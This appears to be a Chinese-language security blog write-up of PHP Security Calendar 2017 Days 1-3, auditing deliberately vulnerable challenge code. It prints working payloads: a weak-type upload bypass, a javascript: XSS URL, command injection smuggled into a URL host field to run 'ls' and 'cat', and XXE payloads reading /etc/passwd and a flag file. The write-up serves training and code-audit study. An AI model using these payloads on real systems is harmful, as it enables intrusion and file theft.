<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="一个代码审计项目">
<meta name="keywords" content="Web">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP SECURITY CALENDAR 2017 Day1-3">
<meta property="og:url" content="http://passer6y.fun/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/index.html">
<meta property="og:site_name" content="Passerby&#39;s Blog">
<meta property="og:description" content="一个代码审计项目">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/p1etqbstbr36yu1hzq10hn5h/image_1d3g7p4rh1e9gece235i9s1ogn9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/9qelxcadm0ay204ml3poth8y/image_1d3g9a3oi1ci623uipgs7l1oj29.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/sg0t0txcij3wjnxh0ef5zc41/image_1d3gubp0f1rlvftc19cn10j66b29.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/d2kxuc28eilfju8y8yjs9gg7/image_1d3h1nlg3civ5ds1j531j3hfa8m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/99b5s8tjxth70w8xy09b3izv/image_1d3id23jr83o1ql5g221q798hp1f.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/exni8w11d1q6128wpj1a6bh4/image_1d3h7r9j1h6l1mr18obj8k1pl99.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x1n97mzh19ux97ccf1oqpgmo/image_1d3ifph741q6897h1cphv8lpq9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/fcbi9ipc47c0lm0i6gjfo4z3/image_1d3ig21iil9g1msltf31tfig6n13.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/xsdvqtime68sax2cys3mmy5z/image_1d3ig9skj1v56vm33qcvc79551j.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/q040o2i1a8whs6ieyf9zy20h/image_1d3igo5v5fsu1co2122s1s661852v.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/ed3203twwte2idgf4lvd2h65/image_1d3igsmjqlsm1fgg8no2mqjqb3c.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/yi628zjazu8cxg87ou5wwimb/image_1d3igv7hi1e331m97sfaaia11p24p.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/dtp1etua594jkbsz05iihhpv/image_1d3ih2r5hidne3c1mlf9p5b0g56.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/7ro3tmdipvmrk1en56k5fzhi/image_1d3iir49t1toq1jtibjn1ei5ems60.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/7iuecrkjgi7vv8zib4kqvgr6/image_1d3l18640p0iet686slngiko4k.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/n4i8ulfhg49ayrsffvd4kr3k/image_1d3jolk9iniis60kn1gdjgtn9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/gt1x37dmotxaccdlwv5idew4/image_1d3l7e9kgvqg6oi1tpg193v1so09.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/kwbctp2a5b8mb7e30f1zozr9/image_1d3l7r40cmru1ks91ejm1oqk1mb39.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/se3ple48jt88cqj1n0mjh4d7/image_1d3l7vpenrinps6fff4pd172v9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/bp8ipalptkf3yl9bwlc77k4p/image_1d3l7lomu1ii11qrglu1qgne5cm.png">
<meta property="og:updated_time" content="2019-02-14T05:53:00.339Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP SECURITY CALENDAR 2017 Day1-3">
<meta name="twitter:description" content="一个代码审计项目">
<meta name="twitter:image" content="http://static.zybuluo.com/Passer6y/p1etqbstbr36yu1hzq10hn5h/image_1d3g7p4rh1e9gece235i9s1ogn9.png">



  <link rel="alternate" href="/atom.xml" title="Passerby's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://passer6y.fun/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>PHP SECURITY CALENDAR 2017 Day1-3 | Passerby's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passerby's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://passer6y.fun/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passerby's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PHP SECURITY CALENDAR 2017 Day1-3
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-02-14 13:00:00 / Modified: 13:53:00" itemprop="dateCreated datePublished" datetime="2019-02-14T13:00:00+08:00">2019-02-14</time>
            

            
              

              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/02/14/PHP SECURITY CALENDAR 2017 Day1-3/" class="leancloud_visitors" data-flag-title="PHP SECURITY CALENDAR 2017 Day1-3">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Views: </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>一个代码审计项目<br><a id="more"></a></p>
<h2 id="Day-1-Wish-List"><a href="#Day-1-Wish-List" class="headerlink" title="Day 1 - Wish List"></a>Day 1 - Wish List</h2><p>考点：<code>in_array()</code>未配置第三个参数，导致弱类型绕过<br>题目源码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">class Challenge &#123;</span><br><span class="line">  const UPLOAD_DIRECTORY = &apos;./solutions/&apos;;</span><br><span class="line">  private $file;</span><br><span class="line">  private $whitelist;</span><br><span class="line"></span><br><span class="line">  public function __construct($file) &#123;</span><br><span class="line">    $this-&gt;file = $file;</span><br><span class="line">    $this-&gt;whitelist = range(1, 24);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function __destruct() &#123;</span><br><span class="line">    if (in_array($this-&gt;file[&apos;name&apos;], $this-&gt;whitelist)) &#123;</span><br><span class="line">      move_uploaded_file(</span><br><span class="line">        $this-&gt;file[&apos;tmp_name&apos;],</span><br><span class="line">        self::UPLOAD_DIRECTORY . $this-&gt;file[&apos;name&apos;]</span><br><span class="line">      );</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$challenge = new Challenge($_FILES[&apos;solution&apos;]);</span><br></pre></td></tr></table></figure></p>
<p>大致的逻辑为上传一个表单<code>name=solution</code>的文件，验证其文件名在<code>range(1,24)</code>的范围，使用的<code>in_array()</code>来进行验证。</p>
<p>问题就出在<code>in_array()</code>函数：<a href="http://php.net/manual/zh/function.in-array.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.in-array.php</a><br><img src="http://static.zybuluo.com/Passer6y/p1etqbstbr36yu1hzq10hn5h/image_1d3g7p4rh1e9gece235i9s1ogn9.png" alt="image_1d3g7p4rh1e9gece235i9s1ogn9.png-34.1kB"></p>
<p>文档中写道，如果没有使用第三个参数<code>$strick=true</code>，则使用弱类型比较，即前先进行类型转换再比较。<br>即我们构造一个文件名为<code>1a.php</code>,经过<code>in_array()</code>的类型转换会变成<code>1</code>从而绕过这个限制。</p>
<p>demo:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$array = range(1,24);</span><br><span class="line">$file_name = &quot;1a.php&quot;;</span><br><span class="line">if(in_array($file_name, $array))&#123;</span><br><span class="line">    var_dump(in_array($file_name, $array));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/9qelxcadm0ay204ml3poth8y/image_1d3g9a3oi1ci623uipgs7l1oj29.png" alt="image_1d3g9a3oi1ci623uipgs7l1oj29.png-70kB"></p>
<p>红日安全提供的一道练习题：<a href="https://xz.aliyun.com/t/2451" target="_blank" rel="noopener">https://xz.aliyun.com/t/2451</a><br>这里用<code>make_set</code>函数绕group，然后报错注入。 没过滤sleep，if，mid盲注也行<br><img src="http://static.zybuluo.com/Passer6y/sg0t0txcij3wjnxh0ef5zc41/image_1d3gubp0f1rlvftc19cn10j66b29.png" alt="image_1d3gubp0f1rlvftc19cn10j66b29.png-69.8kB"></p>
<h2 id="Day-2-Twig"><a href="#Day-2-Twig" class="headerlink" title="Day 2 - Twig"></a>Day 2 - Twig</h2><p>考点：<code>filter_var</code>的url验证绕过<br>题目源码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">// composer require &quot;twig/twig&quot;</span><br><span class="line">require &apos;vendor/autoload.php&apos;;</span><br><span class="line"></span><br><span class="line">class Template &#123;</span><br><span class="line">  private $twig;</span><br><span class="line"></span><br><span class="line">  public function __construct() &#123;</span><br><span class="line">    $indexTemplate = &apos;&lt;img &apos; .</span><br><span class="line">      &apos;src=&quot;https://loremflickr.com/320/240&quot;&gt;&apos; .</span><br><span class="line">      &apos;&lt;a href=&quot;&#123;&#123;link|escape&#125;&#125;&quot;&gt;Next slide &amp;raquo;&lt;/a&gt;&apos;;</span><br><span class="line"></span><br><span class="line">    // Default twig setup, simulate loading</span><br><span class="line">    // index.html file from disk</span><br><span class="line">    $loader = new Twig\Loader\ArrayLoader([</span><br><span class="line">      &apos;index.html&apos; =&gt; $indexTemplate</span><br><span class="line">    ]);</span><br><span class="line">    $this-&gt;twig = new Twig\Environment($loader);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function getNexSlideUrl() &#123;</span><br><span class="line">    $nextSlide = $_GET[&apos;nextSlide&apos;];</span><br><span class="line">    return filter_var($nextSlide, FILTER_VALIDATE_URL);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function render() &#123;</span><br><span class="line">    echo $this-&gt;twig-&gt;render(</span><br><span class="line">      &apos;index.html&apos;,</span><br><span class="line">      [&apos;link&apos; =&gt; $this-&gt;getNexSlideUrl()]</span><br><span class="line">    );</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">(new Template())-&gt;render();</span><br></pre></td></tr></table></figure></p>
<p>两个过滤点，一个是twig模板引擎自带的<code>escape</code>过滤：<a href="https://twig.symfony.com/" target="_blank" rel="noopener">https://twig.symfony.com/</a><br><img src="http://static.zybuluo.com/Passer6y/d2kxuc28eilfju8y8yjs9gg7/image_1d3h1nlg3civ5ds1j531j3hfa8m.png" alt="image_1d3h1nlg3civ5ds1j531j3hfa8m.png-59kB"></p>
<p>也就是htmlspecialchars实现的过滤。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&amp; (&amp; 符号)  ===============  &amp;amp;</span><br><span class="line">&quot; (双引号)  ===============  &amp;quot;</span><br><span class="line">&apos; (单引号)  ===============  &amp;apos;</span><br><span class="line">&lt; (小于号)  ===============  &amp;lt;</span><br><span class="line">&gt; (大于号)  ===============  &amp;gt;</span><br></pre></td></tr></table></figure></p>
<p>第二个点：<code>filter_var($nextSlide, FILTER_VALIDATE_URL)</code>，检测是否为一个合法的url。<br><img src="http://static.zybuluo.com/Passer6y/99b5s8tjxth70w8xy09b3izv/image_1d3id23jr83o1ql5g221q798hp1f.png" alt="image_1d3id23jr83o1ql5g221q798hp1f.png-78.6kB"></p>
<p>这里给出的payload：<code>?url=javascript://comment％250aalert(1)</code><br>即<code>%25-&gt;%</code>,<code>%0a-&gt;换行符</code>，二次url编码，第一次为传入时浏览器接码一次，第二次为解析时，浏览器解码换行符。<br>所以JavaScript伪协议和换行绕过了这个限制。</p>
<p>红日安全提供的一个练习题：<a href="https://xz.aliyun.com/t/2491" target="_blank" rel="noopener">https://xz.aliyun.com/t/2491</a><br><img src="http://static.zybuluo.com/Passer6y/exni8w11d1q6128wpj1a6bh4/image_1d3h7r9j1h6l1mr18obj8k1pl99.png" alt="image_1d3h7r9j1h6l1mr18obj8k1pl99.png-174.5kB"><br>显然这里不是考察orange的<code>parse_url</code>函数和<code>curl</code>处理host的差异，这里要求我们parse_url处理后的host以规定的域名结尾，所以我们可控的就是前面，</p>
<p>这里测试的php版本为5.5：</p>
<p>简单测试了一下<code>filter_var</code>的url合法检测情况(爆破的时候记得将brup的自动url编码关掉)<br><img src="http://static.zybuluo.com/Passer6y/x1n97mzh19ux97ccf1oqpgmo/image_1d3ifph741q6897h1cphv8lpq9.png" alt="image_1d3ifph741q6897h1cphv8lpq9.png-145kB"></p>
<p>其实这里漏了一个<code>%23</code>，没有<code>#</code>锚点的特殊功能，单纯只是一个字符<code>#</code><br><code>url=http://demo.com%23sec-redclub.com</code><br><img src="http://static.zybuluo.com/Passer6y/fcbi9ipc47c0lm0i6gjfo4z3/image_1d3ig21iil9g1msltf31tfig6n13.png" alt="image_1d3ig21iil9g1msltf31tfig6n13.png-57.2kB"></p>
<p>还有换成别的协议还能用分号绕过,这一步在命令执行里面很关键：<code>?url=demo://demo.com;sec-redclub.com</code><br><img src="http://static.zybuluo.com/Passer6y/xsdvqtime68sax2cys3mmy5z/image_1d3ig9skj1v56vm33qcvc79551j.png" alt="image_1d3ig9skj1v56vm33qcvc79551j.png-66.5kB"></p>
<p>再来看看着如何绕过第二步<code>parse_url($url)[&#39;host&#39;]</code>的正则匹配：<br><code>url=demo://demo.com;ls;sec-redclub.com</code><br><img src="http://static.zybuluo.com/Passer6y/q040o2i1a8whs6ieyf9zy20h/image_1d3igo5v5fsu1co2122s1s661852v.png" alt="image_1d3igo5v5fsu1co2122s1s661852v.png-60.3kB"></p>
<p>进一步构造：<br><img src="http://static.zybuluo.com/Passer6y/ed3203twwte2idgf4lvd2h65/image_1d3igsmjqlsm1fgg8no2mqjqb3c.png" alt="image_1d3igsmjqlsm1fgg8no2mqjqb3c.png-73.3kB"></p>
<p><img src="http://static.zybuluo.com/Passer6y/yi628zjazu8cxg87ou5wwimb/image_1d3igv7hi1e331m97sfaaia11p24p.png" alt="image_1d3igv7hi1e331m97sfaaia11p24p.png-90.6kB"><br>payload:<code>?url=demo://aa&quot;;ls;&quot;sec-redclub.com</code></p>
<p>读flag：<code>?url=demo://aa&quot;;cat${IFS}f1agi3hEre.php;&quot;sec-redclub.com</code></p>
<p><img src="http://static.zybuluo.com/Passer6y/dtp1etua594jkbsz05iihhpv/image_1d3ih2r5hidne3c1mlf9p5b0g56.png" alt="image_1d3ih2r5hidne3c1mlf9p5b0g56.png-105.4kB"></p>
<h2 id="Day-3-Snow-Flake"><a href="#Day-3-Snow-Flake" class="headerlink" title="Day 3 - Snow Flake"></a>Day 3 - Snow Flake</h2><p>题目源码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">function __autoload($className) &#123;</span><br><span class="line">  include $className;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$controllerName = $_GET[&apos;c&apos;];</span><br><span class="line">$data = $_GET[&apos;d&apos;];</span><br><span class="line"></span><br><span class="line">if (class_exists($controllerName)) &#123;</span><br><span class="line">  $controller = new $controllerName($data[&apos;t&apos;], $data[&apos;v&apos;]);</span><br><span class="line">  $controller-&gt;render();</span><br><span class="line">&#125; else &#123;</span><br><span class="line">  echo &apos;There is no page with this name&apos;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class HomeController &#123;</span><br><span class="line">  private $template;</span><br><span class="line">  private $variables;</span><br><span class="line"></span><br><span class="line">  public function __construct($template, $variables) &#123;</span><br><span class="line">    $this-&gt;template = $template;</span><br><span class="line">    $this-&gt;variables = $variables;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function render() &#123;</span><br><span class="line">    if ($this-&gt;variables[&apos;new&apos;]) &#123;</span><br><span class="line">      echo &apos;controller rendering new response&apos;;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      echo &apos;controller rendering old response&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>初看源码其实并不知道哪有漏洞，可控的点操作的东西小很少，而且也没有输出的地方。</p>
<p>可以看到文档中写到<code>class_exists()</code>的用法：<br><a href="http://php.net/manual/zh/function.class-exists.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.class-exists.php</a></p>
<p>默认是类不存在时调用<code>__autoload()</code>函数的<br><img src="http://static.zybuluo.com/Passer6y/7ro3tmdipvmrk1en56k5fzhi/image_1d3iir49t1toq1jtibjn1ei5ems60.png" alt="image_1d3iir49t1toq1jtibjn1ei5ems60.png-61.6kB"></p>
<blockquote>
<p>文档中写到，<code>__autoload()</code>在php7.2已经废弃，取而代之的是<code>spl_autoload_register()</code></p>
</blockquote>
<p>还有一些会自动调用<code>__autoload()</code>函数的函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">call_user_func()</span><br><span class="line">call_user_func_array()</span><br><span class="line">class_exists()</span><br><span class="line">class_implements()</span><br><span class="line">class_parents()</span><br><span class="line">class_uses()</span><br><span class="line">get_class_methods()</span><br><span class="line">get_class_vars()</span><br><span class="line">get_parent_class()</span><br><span class="line">interface_exists()</span><br><span class="line">is_a()</span><br><span class="line">is_callable()</span><br><span class="line">is_subclass_of()</span><br><span class="line">method_exists()</span><br><span class="line">property_exists()</span><br><span class="line">spl_autoload_call()</span><br><span class="line">trait_exists()</span><br></pre></td></tr></table></figure></p>
<p>然而的是<code>PHP5~5.3</code>才能用<code>.</code>符号，在php5.4修复了这个问题，所以既不能目录穿越，也不能 包含当前目录下的<code>.php</code>等文件。</p>
<p>第二个漏洞产生的原因就是因为类名和其实例化传入的参数可控，导致我们可以控制php内部存在漏洞的类。</p>
<p>exp demo:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"># 让php允许外部实体</span><br><span class="line">libxml_disable_entity_loader(false);</span><br><span class="line"></span><br><span class="line">$xml = &lt;&lt;&lt;EOF</span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE test [</span><br><span class="line">    &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;user&gt;&amp;xxe;&lt;/user&gt;</span><br><span class="line">EOF;</span><br><span class="line"></span><br><span class="line">$xml_class = new SimpleXMLElement($xml, LIBXML_NOENT | LIBXML_DTDLOAD);</span><br><span class="line">var_dump($xml_class);</span><br><span class="line">// LIBXML_NOENT: 将xml实体引用替换成对应的值</span><br><span class="line">// LIBXML_DTDLOAD: 加载DOCTYPE中的DTD文件</span><br></pre></td></tr></table></figure></p>
<p>payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?c=SimpleXMLElement&amp;d[v]=2&amp;d[t]=&lt;%3fxml+version%3d&quot;1.0&quot;%3f&gt;&lt;!DOCTYPE+ANY+[&lt;!ENTITY+xxe+SYSTEM+&quot;php%3a//filter/read%3dconvert.base64-encode/resource%3d/Users/passer6y/Documents/ctf/phpAuditLabs/day3_class_exists/f1agi3hEre.php&quot;&gt;]&gt;&lt;x&gt;%26xxe%3b&lt;/x&gt;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/7iuecrkjgi7vv8zib4kqvgr6/image_1d3l18640p0iet686slngiko4k.png" alt="image_1d3l18640p0iet686slngiko4k.png-149.7kB"></p>
<blockquote>
